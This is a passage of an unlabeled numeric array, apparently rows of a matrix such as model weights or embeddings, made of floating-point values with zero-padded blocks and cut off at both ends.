0.191347, 0.124359, -0.216777, -0.813155, 0.813936, -0.0926275, 0.0294841, -0.0234788, 0.851044, -0.310646, 0.79908, -1.18137, -0.00794804, 0.0994801, 0.951671, -0.266743, -0.281261, -0.384125, 0.0802083, 1.5333, 0.319695, 0.0711581, 0.851254, 0.633829, -1.07175, 0.249073, -0.190516, 0.48662, 0.435457, 2.38577, 1.61199, 0.342093, 0.0657524, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.949052, 0.695792, -0.515945, -0.190663, 0.732786, -2.00262, -0.541661, -0.434883, 0.386486, 0.255857, 2.27304, -0.902119, -0.631274, 1.41158, -0.579462, 0.0111682, -0.152015, 0.302815, -0.725427, 0.218533, 0.494471, -0.378959, 0.339985, -0.0483479, 0.0428619, -1.3584, -0.608176, 0.122778, 0.424364, 0.525906, 0.564177, 0.650813, -0.416894, -0.286998, 1.30127, -3.0729, -0.713153, -0.970438, -0.0178851, 0.471966, -0.0416125, -0.83092, -0.836537, -1.10521, -0.383623, -1.39014, -2.8078, -1.93634, 0.851692, -0.166098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.516101, 0.551045, 0.929613, -0.414174, 0.452648, 0.896511, -0.652702, 0.831842, 0.827391, 0.220768, 0.464701, 0.401416, 0.240852, -0.279534, -0.267248, -0.00641088, 0.938662, 0.415578, 0.0569916, 0.0866695, 0.997541, -0.624842, -0.516517, -0.0493841, 0.00188086, 1.31533, -0.221167, -1.73544, 0.449714, -0.0668909, -0.0353895, 0.586362, 0.0386839, 0.266589, 0.189778, -0.0126351, -0.854402, 1.08884, 0.163547, -0.134133, -0.12194, 0.335531, 0.62834, 0.0129163, -0.295834, 0.115979, 0.461579, 2.11008, 0.0499943, 0.327122, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.230536, -0.00819474, -0.06855, 0.0448088, -0.223975, -0.542313, 0.218674, 0.252032, -0.14038, 0.0860394, 0.173627, -0.538887, -0.0170857, -0.0256953, -0.215217, -0.0328605, -0.223916, 0.0864775, 0.16766, -0.355633, 0.104663, -0.00674624, 0.018833, 0.00893512, 0.00664579, 0.225743, -0.156968, 0.00890001, -0.215367, 0.112971, 0.39514, 0.358788, -0.132104, -0.329971, -0.154667, -0.0224272, -0.150939, -0.0948775, 0.162848, -0.0030095, -0.148377, -0.0701213, 0.37609, 0.316339, -0.0239319, 0.121253, -0.331359, -0.209862, 0.0345536, 0.255761, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [2.54737, 0.126344, 0.33411, 0.717981, 0.0883363, 0.991426, 0.148556, 0.413172, -3.19024, -0.756516, 0.495036, -0.433314, -0.72594, 0.209025, 0.0276909, -0.000542997, -0.284336, -0.846839, 0.681862, -0.463437, -0.34728, 0.13391, -0.0137406, 0.0214914, 0.0231283, 0.515972, -0.295743, -0.0839817, -0.330496, -0.10813, -0.00786992, 0.177013, 2.26378, 0.410262, 0.786648, -0.15808, -0.801914, -0.491058, 0.0593445, -1.18496, -0.153509, -2.11129, -0.133756, 0.346528, 0.435979, 0.507968, -0.239302, 0.434813, 0.0898213, 0.0229776, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.223001, 1.13404, -1.59523, -0.28979, -0.326286, 0.0395743, -0.250676, 0.178945, -0.491634, 0.215334, -0.237242, -0.824158, -0.309949, 0.151969, -0.528733, 0.0368399, 0.391899, -0.385338, 0.188172, 0.307479, -0.287544, -0.117552, 0.192367, -0.00368197, 0.0385067, -0.366204, 0.350237, 0.525193, 0.488556, 0.778827, 0.0570012, -0.232371, 2.02219, -0.345551, 2.53127, 0.453243, 0.090101, -0.285315, -1.33723, 0.974386, 0.196762, 0.0615366, 0.378096, 0.175499, 0.0359751, -0.184549, -0.8556, -0.204759, 0.127161, 0.56873, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0131053, -0.0136146, 0.00670848, 0.00288815, -0.0564016, -0.0227677, -0.00507437, -0.031917, 0.0122272, -0.0410778, 0.0299648, -0.00969436, 0.0408508, 0.0312088, -0.0382029, 0.0431488, -0.0121752, -0.00471847, 0.0132384, 0.0363017, 0.00231722, -0.0259732, -0.0522198, -0.0136057, -0.023365, -0.0275964, -0.00966017, 0.00596633, 0.00490808, 0.00306836, -0.0187773, 0.0202049, -0.0176302, -0.0329855, -0.0264893, -0.0332673, 0.0346079, 0.00395447, -0.0419245, 0.0179206, -0.0323322, 0.0317468, -0.0520488, -0.0532633, 0.00012942, -0.0239133, -0.00441817, -0.0320353, 0.0111189, 0.00876436, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.5919, -0.388482, -0.167854, -0.0654621, 0.183011, 0.698278, -0.364691, 0.771179, -0.534327, 0.538842, -0.0886628, -0.163222, 1.15133, -0.0319073, -0.0910775, -0.00798116, 0.254573, 0.301434, 0.632051, 0.733379, 0.991705, -0.286001, -0.175332, -0.0319371, -0.0201389, -0.152725, -0.288123, -0.637127, -1.51372, 0.235774, -0.237466, 0.586131, -1.12468, 0.573768, 0.151709, -0.356991, -2.46592, -0.193679, 0.0533088, -1.33711, -0.245567, -0.324767, -0.0732654, 0.0236882, -0.0483518, -2.47549, -2.09975, -0.0217902, 0.110563, 0.175483, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.98408, 0.910592, -0.0600255, 0.353189, -1.19002, 0.0800286, -0.771398, -0.524373, 0.308754, 0.784854, 0.383238, -0.944591, 0.799016, -0.381329, 1.48239, -0.0019988, -1.09457, -0.34209, -0.880602, 0.128874, 0.553916, -0.652839, -0.44951, 0.00634436, -0.015117, 0.347821, 0.200012, 0.00622142, 0.208426, -0.518804, -0.0796938, -0.562364, -0.0155025, -0.00978837, -0.537485, -0.577528, 0.372109, -0.671776, -0.262451, -0.718552, 0.0909849, -0.213349, 0.0982192, -0.358495, 0.718444, -3.21966, 0.663638, -0.428151, -0.784072, -0.349844, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.846377, 0.0520959, -0.718714, 0.00411009, -0.233394, 0.278327, -0.195366, 0.115785, -0.162096, 0.174486, 0.648973, 0.348923, -0.484818, -0.568987, -0.625222, -0.0479618, 1.11466, -0.159343, 0.577442, -0.0874765, -0.0240376, -0.105745, 0.159636, 0.00693703, -0.00155582, 0.393865, -0.0767706, -1.00687, -0.462243, 0.00461545, 0.336, -0.200073, 0.406677, -0.018782, 0.302943, -0.587313, 0.324633, 0.159269, -0.0117235, -0.359756, 0.131851, 0.123657, -0.0975068, -0.267502, 0.412216, 0.420455, 0.458763, 0.315052, 0.0390779, 0.684284, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.11135, 0.0259312, 0.379167, 0.217057, -0.441625, -0.141644, 0.323883, -0.150831, -0.0146716, 0.769249, -0.0752434, 0.777941, 0.101847, 0.0641381, -0.023042, 0.0258893, 0.889159, -0.0177214, 0.414503, -0.238582, -0.124547, -0.0325948, -0.241848, -0.0215171, 0.0205436, 0.325269, 0.324439, -0.0187689, -1.64957, 0.0955764, 0.303657, -0.29347, -1.10382, 0.515836, -0.922844, -0.205015, 0.31502, -0.310876, -0.0721522, 0.849182, 0.730565, 0.893679, 0.564884, 0.106115, -0.116744, -0.814282, -0.26168, -0.523659, -1.1603, -0.136586, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.01615, -4.05499, -0.262902, -0.571711, 0.17747, 0.756045, 0.556274, -0.772084, -2.6943, -0.10044, -4.39544, -0.150447, 0.811485, -0.0732979, 0.936131, 0.0330499, 0.227866, -1.14576, -0.512806, 0.0655494, 0.0419259, 0.267803, 0.0253937, 0.0253669, 0.0156294, 0.252737, -0.0292657, 0.00178878, 1.97356, 0.400268, -0.232988, -0.308826, 1.80062, 0.151196, -1.55502, -0.882074, 1.05251, 0.3122, -0.0979487, 2.1647, -0.218555, 0.286177, 1.05413, -0.160906, 0.0528782, -0.667814, -0.615577, 0.232438, -0.0828356, 0.0254076, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0170114, 0.0285327, -0.0410167, -0.012994, -0.00167207, -0.0238647, -0.0326712, -0.0490662, -0.0442938, -0.0324038, -0.00787427, -0.00306703, -0.050859, 0.00863903, -0.0373346, -0.00416204, -0.0567809, -0.00933463, -0.0611227, 0.0107885, 0.00421092, 0.021868, -0.0493151, 0.0306707, -0.0076208, -0.0279363, -0.0107116, 0.000827201, -0.0273795, -0.0475977, 0.0218551, -0.0349687, 0.00386473, -0.0128086, -0.0402414, 0.00832431, 0.0172225, -0.0008524, -0.0012729, -0.00231625, 0.0368154, 0.0195299, 0.0271765, -0.0443422, 0.0118703, -0.0199886, -0.0356111, -0.00439261, 0.0132566, 0.0109279, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0501081, 0.60103, -0.485923, 0.398342, -0.722098, -0.765445, -0.195573, -0.209708, -0.594946, 0.292866, -0.20046, -0.677279, -0.595361, 0.131226, -0.188303, -0.0175561, -0.634408, -0.00900963, -0.0629575, -0.53843, -0.161467, 0.10013, 0.576146, 0.0598586, -0.00145817, -0.739675, 0.537508, 0.365237, -0.445162, 0.477253, 0.686857, 0.112942, 1.29285, -0.442391, -0.234827, -0.446172, -0.106022, -0.462136, 0.719057, -0.89006, -0.295949, -0.189294, 0.445483, 0.0251899, 0.0127066, 0.656836, -0.326815, -1.44461, 0.308931, 0.577917, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.101505, -1.33299, -0.47686, -0.607576, 1.16175, 0.366273, -0.478202, -1.54508, 0.0948004, -0.376596, 0.386784, -0.808952, 0.0679895, -1.28861, -0.646332, -0.0149182, -0.447404, 0.0981967, -0.341404, -0.0352556, -0.592438, -0.722112, 0.29955, -0.0309172, 0.00942818, 0.312844, -0.644849, 0.54818, 3.86582, -0.216747, -0.95272, -0.0307269, -0.26783, 0.813811, 0.567783, 2.5683, -1.27553, 1.11669, 0.0364032, 1.10831, 1.01186, 1.34957, -2.26959, -0.344441, -0.110769, -0.573064, 0.875236, -2.96192, -0.636555, 0.351108, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.118821, -0.711704, -0.483826, -0.711152, 0.224225, 0.504476, -1.07138, 0.14483, 0.442006, -0.4319, 0.335898, -0.438699, 0.0901052, 0.382978, 0.520548, -0.0279068, 0.472178, 0.276704, 0.56856, 0.0600448, -0.421549, 0.211137, -0.507163, 0.023661, -0.00295901, -0.0511164, 0.802445, 0.061451, 2.99368, -0.159137, -0.521687, 0.607983, 0.367896, -0.0924293, -1.00305, -0.29721, 0.168724, 0.174405, 0.360866, -0.758413, -0.745258, -0.468658, 0.147287, -0.731458, 0.08567, -3.41705, -1.04195, -1.05976, -0.228164, 0.354267, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0231191, -0.0191129, 0.0131136, 0.0141995, -0.0249854, -0.0166232, -0.00533991, -0.0547539, -0.0119782, -0.000758512, 0.02611, -0.0312707, -0.0487335, 0.0204541, 0.0230853, -0.0266967, 0.0276805, -0.0513139, 0.0263219, 0.0123733, -0.049789, -0.0241865, 0.0231673, -0.0153336, 0.00488566, -0.0110052, -0.0164689, -0.044506, -0.0251296, -0.0254321, 0.0363359, -0.000538926, 0.00512794, -0.0186671, 0.0301295, -0.0470245, -0.0253187, -0.00574005, 0.0126691, -0.00599197, -0.05047, -0.0235241, 0.00215916, 0.0188486, -0.0047503, -0.0494921, -0.0430759, 0.00985635, -0.0106318, -0.0544856, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00899037, -0.00991475, -0.0654187, -0.00634113, 0.0315086, -0.00371812, 0.020114, 0.0262322, -0.0595457, 0.0147716, 0.00936178, -0.0453068, -0.0513146, 0.0287964, -0.0349374, 0.0272747, -0.0444495, 0.015091, -0.0115782, 0.0106196, -0.056498, -0.0199807, -0.0180056, 0.0326467, 0.000317171, -0.0443625, 0.0418722, -0.0200461, 0.0214828, -0.00155139, -0.0421826, 0.00579827, 0.0101929, -0.00562787, -0.0365458, -0.001269, -0.0111437, -0.0241591, 0.0215608, -0.0151014, -0.0414119, -0.0302684, -0.0130698, 0.031025, -0.0490104, -0.0351308, 0.0409983, -0.0416246, 0.0218909, -0.0249918, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.417677, 0.178378, -0.159165, 0.00756481, 0.36328, 0.292867, -0.000663777, -0.350055, -0.0189875, -0.300583, -0.131264, 0.325389, -0.397865, 0.238333, 0.335681, 0.00196719, 0.0893672, -0.0614185, 0.247462, 0.154183, -0.110438, 0.469841, -0.243611, 0.0299908, 0.00118584, -1.40512, 0.0589059, 0.0685535, 0.876802, -0.281117, -0.192992, 0.221137, -0.944871, 0.173591, -0.323839, -0.220512, -0.163621, 0.171892, -0.0217363, -0.369812, 0.0905784, -0.26121, 0.166026, 0.304108, 0.130296, -0.208825, 0.104663, 0.0569632, -0.472228, 0.00827289, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.352834, 0.0912263, -0.293044, 0.444613, -0.671747, 0.714586, 0.660366, -0.917384, -0.164593, 0.0289918, -2.84676, -0.421595, -0.38543, 0.916431, -0.483114, 0.013907, -0.40374, -2.51905, -0.459355, 0.111568, -0.204692, 0.149458, 0.13239, 0.0392036, 0.0298877, 0.998619, -0.529835, -0.18192, -0.720733, -0.058407, -0.695292, -2.23782, 0.256593, 0.192768, 0.373367, -0.876898, 0.905971, 0.655965, -0.177277, 0.0885312, 0.429833, -0.220705, -0.047216, 0.816202, -0.000984705, 0.645541, 0.00651273, 0.803117, 0.30903, 0.263423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0354195, 0.757284, 0.148779, 0.0329312, -0.461128, 0.308481, 0.975617, 0.611835, 0.372968, -0.232524, 1.08012, 1.47459, -0.260563, -0.919272, 0.789708, -0.000633168, -0.666059, 0.187748, -0.140832, 0.692789, -0.0823575, 1.02284, -0.523266, -0.0151545, -0.0164329, -0.452662, 0.510691, 0.703769, 1.50028, -0.59606, -0.0238806, -0.658597, -1.00742, 0.831208, 0.296629, -0.260439, -1.31254, 0.237762, -0.00840255, -0.933356, -0.247145, 0.377014, 0.575535, -0.534841, -0.59269, 0.776199, -1.35765, -1.32483, -0.651175, 0.0227004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2932, -0.2186, -0.5493, 0.2279, -0.11475, 0.1138, -0.07056, 0.02242, 0.7627, 0.0477, -0.1273, 0.0002131, -0.3425, 0.05667, 0.08405, -0.0005946, 0.0995, 0.11, 0.213, 0.0834, -0.2651, -0.1914, 0.1572, -0.03207, 0.004093, -0.182, 0.3267, -0.3572, 0.6406, 0.2155, -0.1965, 0.1221, 0.2067, 0.497, -0.1316, 0.0066, -0.3435, -0.11816, -0.02136, -0.3958, 0.03726, 0.3088, 0.03418, -0.144, -0.3022, -0.1399, 0.02702, 0.2515, -0.3591, 0.471], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.249, 1.089, 0.3674, -0.2532, 0.1567, 0.3682, -0.336, -0.1658, 0.1515, -0.12115, 0.7803, -0.285, -1.302, 0.3896, 0.1093, -0.04117, 0.3308, 1.059, -0.4248, -0.1078, -0.4902, 0.8325, 0.2805, -0.01112, -0.04376, 0.3037, 0.2441, 0.4985, 0.1489, 0.4443, -0.1098, 0.627, 1.044, 0.2252, -3.008, 0.335, -0.2617, -0.581, -0.839, -0.03754, 0.04303, -0.02931, 0.4104, -0.669, -0.2866, -0.5093, 0.817, 0.6045, -0.05106, 0.4856], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5166, 0.1886, 0.1539, 0.06836, -0.02188, 0.3774, -0.3218, -0.6235, 0.08795, -0.294, 0.08594, -0.03867, -0.201, -0.4426, 0.9907, -0.043, -0.1682, -0.3997, -0.05908, 0.2118, -0.0147, -0.459, -0.2522, -0.03065, 0.01724, 0.159, 0.3293, 0.4985, -0.2622, 0.2499, 0.2764, -0.4207, -0.43, 0.1421, 0.05713, -0.2327, -0.1653, 0.0359, 0.2637, 0.126, 0.2942, 0.06366, -0.02396, -0.1853, 0.4502, 0.1484, -0.6006, -0.7285, 0.0984, -0.0777], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5234, -1.177, 0.2394, 0.2942, -0.029, 0.2922, -0.04828, 0.2712, 0.1209, -0.11505, -0.2166, 0.498, 0.3772, -0.629, 0.202, -0.0395, 0.2695, -0.2428, -0.1715, -0.678, 0.6636, -0.3938, -0.0882, 0.02975, 0.04352, 0.3208, 0.3164, -1.14, 0.1204, 0.010895, -0.276, -0.2405, -0.1312, -0.894, -0.408, -0.3381, -0.756, -0.875, -0.06155, 0.174, -0.2032, 0.5415, 0.2073, -0.1902, 0.11554, 0.4824, 0.01399, 0.1295, 0.415, -0.168], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.64, 0.1516, 0.1594, -0.1923, 0.3599, -0.38, 0.08026, 0.3828, 0.7046, -0.4243, 0.3425, 0.6074, -0.5137, -0.5054, 0.635, 0.01695, -0.0168, -0.1198, -0.1831, -0.215, 0.04346, -0.5757, -0.961, -0.01688, 0.00911, 0.8984, 0.2062, -0.7095, -1.366, 0.313, -0.2502, 0.1315, -0.2206, 0.33, -0.956, 0.1471, 0.638, 0.1798, 0.2247, 0.821, -0.2328, 0.4424, 0.3894, 0.1791, 0.3767, -0.4788, -0.0866, 0.992, -0.8677, 0.11017], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.7256, -0.11066, 0.00872, -0.0552, 1.046, -0.1066, -1.7, 0.216, -0.09796, 0.01694, 1.114, -0.4917, -0.306, -0.3828, -0.8823, 0.0358, -0.925, 0.628, -0.6553, 0.2495, 0.4836, 0.2179, -0.03244, 0.01291, -0.01784, -0.503, -0.306, -0.9414, -0.5737, -0.206, -0.7397, 0.5317, -0.01101, 0.477, 0.925, 0.924, -1.279, -0.205, -0.003283, -1.599, -0.0433, 0.1062, 